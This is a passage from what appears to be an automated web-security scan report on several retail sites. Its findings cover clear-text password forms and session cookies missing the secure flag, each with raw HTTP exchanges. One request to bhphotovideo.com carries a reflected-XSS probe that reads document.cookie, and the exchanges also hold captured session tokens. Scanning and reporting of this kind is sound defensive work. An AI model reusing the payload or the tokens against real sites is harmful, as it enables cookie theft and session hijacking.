//the shoprunner object
var sr_$={};
sr_$.contents={}
...[SNIP]...
</div>';

//learn step 1
var s1_form='<form action="step1" id="sr_lrn1F" name="sr_step1" onsubmit="if(sr_$.actions.validate.form(\'sr_lrn1F\')){sr_$.actions.learnStep(2);}return false;"><h4 class="sr_htag">
...[SNIP]...
</label><input class="sr_vpassword" name="password2" tabindex="1" type="password"></li>
...[SNIP]...

8.3. http://www.ftd.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; markcode=528; v_id=11503077676663641757469614643386; s_id=22359894871736752832630692038142; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; s_cc=true; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; s_sq=%5B%5BB%5D%5D; last_active=1305510017604; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; mbcs=129049F1-9E12-5C65-0540-FAB5539F48D0; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; fsr.a=1305510799352

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 16 May 2011 01:53:22 GMT
X-Varnish: 767403341 767403290
Age: 1
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 136387


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div style="margin-bottom:20px; margin-top:15px;"><form name="create_account" id="create_account" method="post" action="" onsubmit="if(document.create_account.email_isvalid.value == 1){ FS.create_account(); }else{ valid_email(document.create_account.email.value, 1,'You have entered an invalid email address', function (){document.create_account.email_isvalid.value = 1; FS.create_account();});} return false;" style="margin:0px;"><table width="600" border="0" cellspacing="0" cellpadding="0">
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password" id="password" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password_ver" id="password_ver" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...

8.4. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /sweet-shop-ctg/product-sweet-shop/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /sweet-shop-ctg/product-sweet-shop/ HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_cc=true; last_active=1305510812803; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511191739; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c; pc1=%7b%7d

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 16 May 2011 10:32:33 GMT
X-Varnish: 887041366
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 198838


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div style="margin-bottom:20px; margin-top:15px;"><form name="create_account" id="create_account" method="post" action="" onsubmit="if(document.create_account.email_isvalid.value == 1){ FS.create_account(); }else{ valid_email(document.create_account.email.value, 1,'You have entered an invalid email address', function (){document.create_account.email_isvalid.value = 1; FS.create_account();});} return false;" style="margin:0px;"><table width="600" border="0" cellspacing="0" cellpadding="0">
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password" id="password" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password_ver" id="password_ver" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...

8.5. http://www.petco.com/Secure/Login.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.petco.com
Path:   /Secure/Login.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password field:

Request

GET /Secure/Login.aspx?ReturnUrl=/Secure/YourAccount.aspx HTTP/1.1
Host: www.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; CMAVID=none; cmTPSet=Y; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; SL_UVId=28F6BEFE806000C3; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; SASId=sid%3DVbDccytV4V9vowfK3PHnkrtcS6teMKbe%3Bcsid%3D2%3Bnsid%3D0%3Blut%3D1305510840147%3B; SAVId=vid%3DjAZPvJCAn9TzbA3IqjIS0BXWEqTAhP6H%3Bnvid%3D0%3Bcvid%3D1%3Bplen%3D88%3Bpid%3D55d11a247d01f4c640b3ba5752e78685d%3Bpdx%3D88%3Bglen%3D233%3Bgid%3Dc3089e6d97b75860d4a6aed45da60c42%3Bgdx%3D233%3Bpt%3D46830%3B; CoreAt=90002311=1|2|0|0|0|0|0|0|0|0|0|0|1|1305510189|14_16_18_20_21_22_25_|&; cmRS=&t1=1305510842039&t2=1305510887898&t3=1305511397575&t4=1305510840070&lti=1305511397570&ln=&hr=http%3A//www.petco.com/Secure/Login.aspx%3FReturnUrl%3D/Secure/YourAccount.aspx&fti=&fn=%3A0%3B%3A1%3B%3A2%3B%3A3%3B&ac=&fd=&uer=&fu=&pi=HOME%20PAGE&ho=customerappreciation.petco.com/cm%3F&ci=90002311

Response

HTTP/1.1 200 OK
P3P: CP="ALL DSP COR IVDi PSD PSA TELi TAIi ADM CUR CONi SAMi OUR IND PHY ONL UNI PUR COM NAV INT CNT PRE"
Location: http://www.petco.com:80/secure/login.aspx?returnurl=/secure/youraccount.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-SL-CompState: TouchUp
X-Strangeloop: ViewState,Compression
Vary: Accept-Encoding
Date: Mon, 16 May 2011 02:13:19 GMT
Connection: close
Set-Cookie: SL_UVId=28F6BEFE806000C3;path=/;
Set-Cookie: sltest=T; path=/; domain=petco.com.
Content-Length: 43574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<div class="ptco-wrap">


<form method="post" action="Login.aspx?ReturnUrl=%2fSecure%2fYourAccount.aspx" id="form1" autocomplete="off">
<div class="aspNetHidden">
...[SNIP]...
<td>
<input name="ctl00$ctl00$cphBody$cphBody$txtPassword" type="password" maxlength="100" id="txtPassword" tabindex="2" autocomplete="off" size="32" onkeypress="javascript:return clickButton(event,&#39;btnLogin&#39;);" style="width:200px" /><br />
...[SNIP]...

9. SSL cookie without secure flag set
There are 19 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


9.1. https://secure.bhphotovideo.com/bnh/controller/home

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.bhphotovideo.com
Path:   /bnh/controller/home

Issue detail

The following cookies were issued by the application and do not have the secure flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bnh/controller/home?O=cart.jsp&A=getpage&Q=Login.jsp&f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd=1 HTTP/1.1
Host: secure.bhphotovideo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://secure.bhphotovideo.com/bnh/controller/home?O=cart.jsp&A=getpage&Q=Login.jsp&f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd=1
Cookie: TS20403f=b545291670a393ddc6eb9163287e33afe2a7ac07bec18dbf4dd10530

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Expires: Mon, 16 May 2011 11:06:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 11:06:56 GMT
Connection: keep-alive
Set-Cookie: JSESSIONID=nr1QNRFMzp!1551726241; domain=bhphotovideo.com; path=/
Set-Cookie: cookieID=18171364821305544044440; domain=bhphotovideo.com; expires=Saturday, 03-Jun-2079 14:21:31 GMT; path=/
Set-Cookie: TS20403f=b545291670a393ddc6eb9163287e33afe2a7ac07bec18dbf4dd10530; Path=/
Content-Length: 30873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="/FrameWork/js/t
...[SNIP]...

9.2. https://secure.homedepot.ca/webapp/wcs/stores/servlet/UserRegistrationForm

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.homedepot.ca
Path:   /webapp/wcs/stores/servlet/UserRegistrationForm

Issue detail

The following cookies were issued by the application and do not have the secure flag set: The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/UserRegistrationForm?langId=-15&storeId=10051&catalogId=10051&new=Y HTTP/1.1
Host: secure.homedepot.ca
Connection: keep-alive
Referer: http://www.homedepot.ca/webapp/wcs/stores/servlet/Home?storeId=10051&catalogId=10051&langId=-15
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=135472616.1305510002.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=989860238041728; hd_search_cookie=1; localRegion=446%2C7080%2CToronto%2C43.6687%2C-79.3382; s_vi=[CS]v1|26E840400507A189-40000102A0090C5F[CE]; __utma=135472616.1475317367.1305510002.1305510002.1305510002.1; __utmc=135472616; __utmb=135472616.2.10.1305510002; RES_SESSIONID=223896591225639; ResonanceSegment=1; s_cc=true; fsr.s={"v":1,"rid":"1305510029454_909320","to":5,"c":"http://www.homedepot.ca/webapp/wcs/stores/servlet/Home","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305510812715}; s_v14=English; s_sq=homedepotca%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttps%25253A%25252F%25252Fsecure.homedepot.ca%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FUserRegistrationForm%25253FlangId%25253D-15%252526storeId%25253D10051%252526%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Date: Mon, 16 May 2011 02:10:38 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: WCS_UNIQUE_ID=HCa6Eud8L9hN21YyVUS%2bHaSDQgY%3d%0a; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/; Domain=.homedepot.ca
Set-Cookie: WC_ACTIVESTOREDATA=%2d15%2c10051; Path=/; Domain=.homedepot.ca
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2crW6rzz%2fYGsIblj6FaaWMw7l8O7Y%3d; Path=/; Domain=.homedepot.ca; Secure
Set-Cookie: WC_USERSESSION_-1002=%2d1002%2c%2d15%2cCAD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c10501%7c10501%7cnull%7c%2d2000%5d%2cSPiv6UKbre34gGrW2piYfWv44EQ%3d; Path=/; Domain=.homedepot.ca
Set-Cookie: JSESSIONID=0001VzTy5fzfDUHAYcFBVD3sOyb:-4C1Q63; Path=/
Cache-Control: no-store, no-cache
Expires: 0
Pragma: no-cache
Content-Length: 75346


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
...[SNIP]...

9.3. https://secure.orientaltrading.com/ui/userProfile/processRequest.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.orientaltrading.com
Path:   /ui/userProfile/processRequest.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ui/userProfile/processRequest.do?requestURI=displayLogin HTTP/1.1
Host: secure.orientaltrading.com
Connection: keep-alive
Referer: http://www.orientaltrading.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=17jLNQBXSqTLZLn22gSGhQZ1qn1JzhCKMpsNG12T0S6Y29Lzpcvx!-2120161015; otc_visitor_id=U6c411c8e35469d5c3d093388c1dc89a2; otc_new_mktg_visitor=21758503; CoreM_State=61~1.0~-1~-1~E~3~3~5~3~3~7~7~|~~|~~|~~|~||||||; mt.v=1.322159034.1305510206640; fsr.s={"v":1,"rid":"1305510222528_763877","pv":2,"to":5,"c":"http://www.orientaltrading.com/","lc":{"d0":{"v":2,"s":true}},"cd":0,"sd":0,"f":1305510848788}

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:16:41 GMT
Server: Apache
Set-Cookie: JSESSIONID=LSR0NQ5JncTchv2GrGWHyGDfvFpDKhs5c5ThHL92VQvcmKBTQLms!-2120161015; domain=.orientaltrading.com; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 85683


                                       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


       
...[SNIP]...

9.4. https://www.acehardware.com/checkout/index.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.acehardware.com
Path:   /checkout/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/index.jsp?process=login HTTP/1.1
Host: www.acehardware.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=vLQsNQBSZphCcjtDjLwwTnfpkzNq3J0JlY9vd1F9mv7FzdpT4zqh!-1418241072; browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=185450681.2052200100.1305510171.1305510171.1305510171.1; __utmc=185450681; s_pers=%20s_lastvisit%3D1305510172069%7C1400118172069%3B%20s_nr%3D1305511373000%7C1308103373000%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1305513173003%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.session={"v":1,"rid":"1305510186434_570135","pv":3,"to":5,"c":"https://www.acehardware.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1305511353374}

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 16 May 2011 10:47:05 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Location: http://www.acehardware.com/home/index.jsp?rdir=1A
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=Rjt8NRQJqLlKLY2QvvNl013snyns5JqFczHh6fVfwf3D2h7Zw8bJ!1001950354; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 293

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www.acehardware.com/home/in
...[SNIP]...

9.5. https://www.footlocker.com/account/default.cfm

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.footlocker.com
Path:   /account/default.cfm

Issue detail

The following cookies were issued by the application and do not have the secure flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /account/default.cfm?action=accountCreate HTTP/1.1
Host: www.footlocker.com
Connection: keep-alive
Referer: http://www.footlocker.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D06; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0; NewRegistrant=Global Header Log In|Create an Account

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:38 GMT
Connection: keep-alive
Set-Cookie: SSLC=web%2D22;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:38 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:38 GMT;path=/
Content-Length: 159425


<!-- -->
<HTML xmlns:fb="http://www.facebook.com/2008/fbml">
<HEAD>
   <script type="text/javascript" src="/ns/common/coradiant/tsedge_instr-min.js"> </script>
   

<title>Foot Locker New Account
...[SNIP]...

9.6. https://www.footlocker.com/account/default/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.footlocker.com
Path:   /account/default/

Issue detail

The following cookies were issued by the application and do not have the secure flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /account/default/ HTTP/1.1
Host: www.footlocker.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D06; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
